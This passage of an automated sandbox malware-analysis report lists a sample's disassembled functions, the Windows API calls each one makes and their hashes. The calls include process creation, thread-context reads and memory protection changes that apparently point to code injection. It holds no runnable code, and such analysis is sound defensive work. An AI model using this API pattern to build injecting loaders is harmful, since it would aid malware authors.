Instruction Fuzzy Hash: F7E0C2B120071242FA3165BC6E4CEF323CC0F04310B04084DF6DAE3180CE70F44088A4

Function 00FE2322 Relevance: 3.9, APIs: 3, Instructions: 159COMMON

Download Yara Rule

APIs

Part of subcall function 00FE22A4: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00FE24F1), ref: 00FE2303

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00FE25A1
CoInitialize.OLE32(00000000), ref: 00FE2618
CloseHandle.KERNEL32(00000000), ref: 0105503A

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 3815369404-0
Opcode ID: 9ff7f9eaa73ff4b6c766b9b411ecfbd812ab30b9223fb71e84ac65a691add49c
Instruction ID: 6321f24302c74d45bd3e26ad42263b84e4a0f4e8aab896d3e82fe15cdad18ffc
Opcode Fuzzy Hash: 9ff7f9eaa73ff4b6c766b9b411ecfbd812ab30b9223fb71e84ac65a691add49c
Instruction Fuzzy Hash: 9A71D0F9901A918FC724EF6AE490495BBA4FB58380FC4822ED0D9C7799DB3E8420DF14

Function 00FE3A0F Relevance: 3.1, APIs: 2, Instructions: 59COMMON

Download Yara Rule

APIs

IsThemeActive.UXTHEME ref: 00FE3A73

Part of subcall function 01001405: __lock.LIBCMT ref: 0100140B

Part of subcall function 00FE3ADB: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00FE3AF3
Part of subcall function 00FE3ADB: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00FE3B08

Part of subcall function 00FE3D19: GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,00FE3AA3,?), ref: 00FE3D45
Part of subcall function 00FE3D19: IsDebuggerPresent.KERNEL32(?,?,?,?,00FE3AA3,?), ref: 00FE3D57
Part of subcall function 00FE3D19: GetFullPathNameW.KERNEL32(00007FFF,?,?,010A1148,010A1130,?,?,?,?,00FE3AA3,?), ref: 00FE3DC8
Part of subcall function 00FE3D19: SetCurrentDirectoryW.KERNEL32(?,?,?,00FE3AA3,?), ref: 00FE3E48

SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00FE3AB3

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
String ID:
API String ID: 924797094-0
Opcode ID: fb875c22d75159775fff1164dd62fd82c35efc455b73446ceae85e3ec7b418db
Instruction ID: 8775de0d73981819429748f5a8f5b8e4e8821340f358e787cfe1f499a045e69b
Opcode Fuzzy Hash: fb875c22d75159775fff1164dd62fd82c35efc455b73446ceae85e3ec7b418db
Instruction Fuzzy Hash: CA11D271A083419FC310EF6AE80891AFBE8FF94750F40891FF5C4872A5DBB99544CB92

Function 0100E9D2 Relevance: 3.1, APIs: 2, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 0100EA29
__close_nolock.LIBCMT ref: 0100EA42

Part of subcall function 01007BDA: __getptd_noexit.LIBCMT ref: 01007BDA

Part of subcall function 01007C0E: __getptd_noexit.LIBCMT ref: 01007C0E

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle__close_nolock
String ID:
API String ID: 1046115767-0
Opcode ID: 7548f7f5c824d6b498286e4f754f06757e4f397e6ada1e3c467643136d7589d8
Instruction ID: 81807c9afff891becef087a7338c96e794af866b67d5d8260ed394ba8e388ac8
Opcode Fuzzy Hash: 7548f7f5c824d6b498286e4f754f06757e4f397e6ada1e3c467643136d7589d8
Instruction Fuzzy Hash: 8411E972405A058AF723BF68C84079C7A916F97331F164B44C4E02F1E1C7B9AC8087A1

Function 00FFF4EA Relevance: 3.0, APIs: 2, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 0100395C: __FF_MSGBANNER.LIBCMT ref: 01003973
Part of subcall function 0100395C: __NMSG_WRITE.LIBCMT ref: 0100397A
Part of subcall function 0100395C: RtlAllocateHeap.NTDLL(00A40000,00000000,00000001,00000001,00000000,?,?,00FFF507,?,0000000E), ref: 0100399F

std::exception::exception.LIBCMT ref: 00FFF51E
__CxxThrowException@8.LIBCMT ref: 00FFF533

Part of subcall function 01006805: RaiseException.KERNEL32(?,?,0000000E,01096A30,?,?,?,00FFF538,0000000E,01096A30,?,00000001), ref: 01006856

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
String ID:
API String ID: 3902256705-0
Opcode ID: 35f3ad82f7c1021db2d902b1c36a217005ff804b6e2237d447e8828e9fb8cc31
Instruction ID: 3ceba11e114a3efe99fe601bfe4ecd5c335f558b4b46aafdf25565cd24a98966
Opcode Fuzzy Hash: 35f3ad82f7c1021db2d902b1c36a217005ff804b6e2237d447e8828e9fb8cc31
Instruction Fuzzy Hash: 29F0AF3150421EA7EB06BF99DC009EE77ACAF10364F684129EA88961D0DBB1D748A7A5

Function 010035E4 Relevance: 3.0, APIs: 2, Instructions: 33COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 01007C0E: __getptd_noexit.LIBCMT ref: 01007C0E

__lock_file.LIBCMT ref: 01003629

Part of subcall function 01004E1C: __lock.LIBCMT ref: 01004E3F

__fclose_nolock.LIBCMT ref: 01003634

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: __fclose_nolock__getptd_noexit__lock__lock_file
String ID:
API String ID: 2800547568-0
Opcode ID: 959938dbbe647c9a3cedd5ebe45f923f98e90b60b1c80ca85cf731e891329ecf
Instruction ID: 70c9fcf7f1153933654339363717e95a14f01e17e33c357afdb998274b5224db
Opcode Fuzzy Hash: 959938dbbe647c9a3cedd5ebe45f923f98e90b60b1c80ca85cf731e891329ecf
Instruction Fuzzy Hash: A8F090718416069EFB137B668C047AE7AE16F65330F29C148C4E0AF2D0CB7C89419E95

Function 00A84C3D Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON

Download Yara Rule

APIs

CreateProcessW.KERNELBASE(?,00000000), ref: 00A853FB
Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00A85491
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00A854B3

Memory Dump Source

Source File: 00000000.00000002.2033236990.0000000000A83000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A83000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a83000_A2028041200SD.jbxd

Similarity

API ID: Process$ContextCreateMemoryReadThreadWow64
String ID:
API String ID: 2438371351-0
Opcode ID: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
Instruction ID: 667dd0644143d09eb6a7095454f23979ae8d092cb9af8ea74f2dfe64d03004b6
Opcode Fuzzy Hash: df6a772f5278f9eae63f3a29a40672dfa4321236305f3f5d8c91d224ff423281
Instruction Fuzzy Hash: B312CE24E24658C6EB24DF64D8507DEB232EF68300F1094E9910DEB7A5E77A4F81CF5A

Function 01002957 Relevance: 1.6, APIs: 1, Instructions: 135COMMON

Download Yara Rule

APIs

__flush.LIBCMT ref: 01002A0B

Part of subcall function 01007C0E: __getptd_noexit.LIBCMT ref: 01007C0E

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: __flush__getptd_noexit
String ID:
API String ID: 4101623367-0
Opcode ID: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction ID: b586110b317ea5febf41d929ca60712bf0aa0b1fd05503a828fd072f3e931e8c
Opcode Fuzzy Hash: ba1b573b9a1c5d238bdcc52ef1885e10968c5b94d85714b9232a10917baff8d1
Instruction Fuzzy Hash: 614195316007069FFB6A8E69C8885AE7BE6AF462A0F14856DE9D5C72C0DF70DD818B40

Function 00FFED18 Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE ref: 00FFEDC7

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction ID: 41efd01d4c4b582b2d2620110113aca2cc3a8ebdb76d31578edf3468fbf4c112
Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
Instruction Fuzzy Hash: 0E31E471A00109DBC718DF18C480A7DFBA6FF49350B6486A5E909CBA76DB31EDC1EB80

Function 01059A75 Relevance: 1.6, APIs: 1, Instructions: 88COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 01059A80

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 01c79dadda95064b78fa7f0837002e33c17915a3caee83ca8f4fb5b263352bc3
Instruction ID: e9850d357c2784c69e091404df5fcc64f2b3a8fbe803775b3daecf973f542abd
Opcode Fuzzy Hash: 01c79dadda95064b78fa7f0837002e33c17915a3caee83ca8f4fb5b263352bc3
Instruction Fuzzy Hash: FF415974504655CFEB24CF18C484B2ABBE0BF44318F1989ACEA9A4B372C776E845DF42

Function 00FE41A9 Relevance: 1.6, APIs: 1, Instructions: 63libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FE4214: FreeLibrary.KERNEL32(00000000,?), ref: 00FE4247

LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00FE39FE,?,00000001), ref: 00FE41DB

Part of subcall function 00FE4291: FreeLibrary.KERNEL32(00000000), ref: 00FE42C4

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: Library$Free$Load
String ID:
API String ID: 2391024519-0
Opcode ID: f5dedaca894e53c01710de4a8ebf2098f7228fcab32320318471a5bfb95303e6
Instruction ID: 92de89661428a320b273ced4981ff6cf760f63aee48bfd1f72f8684a37602154
Opcode Fuzzy Hash: f5dedaca894e53c01710de4a8ebf2098f7228fcab32320318471a5bfb95303e6
Instruction Fuzzy Hash: B7119432600246AADB10BB66DC16F9E77A59F40700F10842DFA96EA1C1DE79AA44AB60

Function 01059B45 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32(?), ref: 01059B51

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: ClearVariant
String ID:
API String ID: 1473721057-0
Opcode ID: 807d0d602a5e253d0e97b68c11311e0cfde50df7e7b099bf28d0408cd02777c1
Instruction ID: 53e3cb161489bd0be70a3be097a3698306e2b0f254e1c2fb5b84b54c98fa52ff
Opcode Fuzzy Hash: 807d0d602a5e253d0e97b68c11311e0cfde50df7e7b099bf28d0408cd02777c1
Instruction Fuzzy Hash: B6213B74504609CFDB24DF68C844B2ABBE1BF84304F18496CEA9647272CB36F845DF52

Function 0100AF61 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

___lock_fhandle.LIBCMT ref: 0100AFC0

Part of subcall function 01007BDA: __getptd_noexit.LIBCMT ref: 01007BDA

Part of subcall function 01007C0E: __getptd_noexit.LIBCMT ref: 01007C0E

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: __getptd_noexit$___lock_fhandle
String ID:
API String ID: 1144279405-0
Opcode ID: a266a965e7167a510294d80cf179674be5da254ed3abf8d2fa5781caae4b9cb8
Instruction ID: ea071d1d732b10983460837b2f55aed669ca16b71130c12f9355b60711735b54
Opcode Fuzzy Hash: a266a965e7167a510294d80cf179674be5da254ed3abf8d2fa5781caae4b9cb8
Instruction Fuzzy Hash: E2119172901A059FF723BFA8C8447AC3BA1AF51331F194644E5F41F1E1DBBA9D408BA1

Function 00FE39DB Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
Instruction ID: 262d8e2329a34e60d2610b5338908eef07161a9eeee81ceb2844b1722dbda0d0
Opcode Fuzzy Hash: 279f5f87aea4605f70f2d64a128fa314d82d263771f3b219d5efef33e318cff7
Instruction Fuzzy Hash: 5001863140014EEEDF45EFA5CC818FEBF74AF20304F008069A56297195EA34AA49EF60

Function 01002AAE Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

__lock_file.LIBCMT ref: 01002AED

Part of subcall function 01007C0E: __getptd_noexit.LIBCMT ref: 01007C0E

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: __getptd_noexit__lock_file
String ID:
API String ID: 2597487223-0
Opcode ID: 993c093d93daceb9ab5d0329b0503bf7c2541671219d5cdb515e73be3fefdcd0
Instruction ID: 76cd32449d4ce33e3261c718b4ab41e4266bfce0b6da13e4b9d236f1b10ac184
Opcode Fuzzy Hash: 993c093d93daceb9ab5d0329b0503bf7c2541671219d5cdb515e73be3fefdcd0
Instruction Fuzzy Hash: 0BF06231500606EBFF23AF698C087DF3AA5AF11320F154455A4949A1D0DB798AA2DB51

Function 00FE4252 Relevance: 1.5, APIs: 1, Instructions: 28COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,?,?,?,?,00FE39FE,?,00000001), ref: 00FE4286

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 9589c47fe876255d6a39d88f67c3ca789a79c0b78dbe05ca018a9ffd0f67b791
Instruction ID: 76cfaeeb2c7a4e78f8c446bf00ec3638399363ed3efac6088434adc4d638518c
Opcode Fuzzy Hash: 9589c47fe876255d6a39d88f67c3ca789a79c0b78dbe05ca018a9ffd0f67b791
Instruction Fuzzy Hash: A6F06DB1905782DFCB359F66D894816BBF4BF153253248A7EF2D686620C772A840EF50

Function 00FE40A7 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FE40C6

Memory Dump Source

Source File: 00000000.00000002.2033391862.0000000000FE1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FE0000, based on PE: true

Associated: 00000000.00000002.2033380964.0000000000FE0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000106D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033429510.000000000108E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033462807.000000000109A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2033477124.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fe0000_A2028041200SD.jbxd

Similarity

API ID: LongNamePath
String ID:
API String ID: 82841172-0
Opcode ID: 6cfd57da955ad7c7e10f5be03d024014d2e225423a5fccd17ccda1d7cd779016
Instruction ID: aa822b199074e19095dc758084551708e7d066397b9c8f14097707f532a6e6df
Opcode Fuzzy Hash: 6cfd57da955ad7c7e10f5be03d024014d2e225423a5fccd17ccda1d7cd779016
Instruction Fuzzy Hash: DCE0CD366001255BC7219655CC45FEE779DDF88A90F050075F945D7244D96899819790

Function 00A85C3C Relevance: 1.3, APIs: 1, Instructions: 21sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00A85C51

Memory Dump Source

Source File: 00000000.00000002.2033236990.0000000000A83000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A83000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a83000_A2028041200SD.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction ID: 2bb8f61c218ba3c2e9a88fc8ef8bdf3ce260d2290cf73b1f108094886ef0274e
Opcode Fuzzy Hash: 647f186050b41918f79179839cbc1a488579cc5f77474145a25b6e124dddc6ea
Instruction Fuzzy Hash: 05E09A7494020DAFDB00EFA4DA4969E7BB4EF04301F1005A5FD0596680DA309A548A62

Function 00A85C40 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000001F4), ref: 00A85C51

Memory Dump Source

Source File: 00000000.00000002.2033236990.0000000000A83000.00000040.00000020.00020000.00000000.sdmp, Offset: 00A83000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a83000_A2028041200SD.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction ID: 7fac13ae3e1a17295d8662d81569897f3232c2947a2f875808daac430cf73a3c
Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
Instruction Fuzzy Hash: 25E0E67494020DDFDB00EFB4DA4969E7FF4EF04301F100165FD01D2280D6309E508A62

Non-executed Functions

Function 0104F7FF Relevance: 74.1, APIs: 40, Strings: 2, Instructions: 630windowkeyboardCOMMON

Download Yara Rule

APIs

Part of subcall function 00FFB34E: GetWindowLongW.USER32(?,000000EB), ref: 00FFB35F

DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0104F87D
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0104F8DC
GetWindowLongW.USER32(?,000000F0), ref: 0104F919
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0104F940
SendMessageW.USER32 ref: 0104F966
_wcsncpy.LIBCMT ref: 0104F9D2
GetKeyState.USER32(00000011), ref: 0104F9F3
GetKeyState.USER32(00000009), ref: 0104FA00
SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0104FA16
GetKeyState.USER32(00000010), ref: 0104FA20
SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0104FA4F
SendMessageW.USER32 ref: 0104FA72
SendMessageW.USER32(?,00001030,?,0104E059), ref: 0104FB6F
ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0104FB85
ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0104FB96
SetCapture.USER32(?), ref: 0104FB9F
ClientToScreen.USER32(?,?), ref: 0104FC03
ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0104FC0F
InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0104FC29
ReleaseCapture.USER32 ref: 0104FC34
GetCursorPos.USER32(?), ref: 0104FC69
ScreenToClient.USER32(?,?), ref: 0104FC76
SendMessageW.USER32(?,00001012,00000000,?), ref: 0104FCD8
SendMessageW.USER32 ref: 0104FD02
SendMessageW.USER32(?,00001111,00000000,?), ref: 0104FD41
SendMessageW.USER32 ref: 0104FD6C
SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0104FD84
SendMessageW.USER32(?,0000110B,00000009,?), ref: 0104FD8F
GetCursorPos.USER32(?), ref: 0104FDB0
ScreenToClient.USER32(?,?), ref: 0104FDBD
GetParent.USER32(?), ref: 0104FDD9
SendMessageW.USER32(?,00001012,00000000,?), ref: 0104FE3F
SendMessageW.USER32 ref: 0104FE6F
ClientToScreen.USER32(?,?), ref: 0104FEC5
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0104FEF1
SendMessageW.USER32(?,00001111,00000000,?), ref: 0104FF19
SendMessageW.USER32 ref: 0104FF3C
ClientToScreen.USER32(?,?), ref: 0104FF86
TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0104FFB6
GetWindowLongW.USER32(?,000000F0), ref: 0105004B

Strings

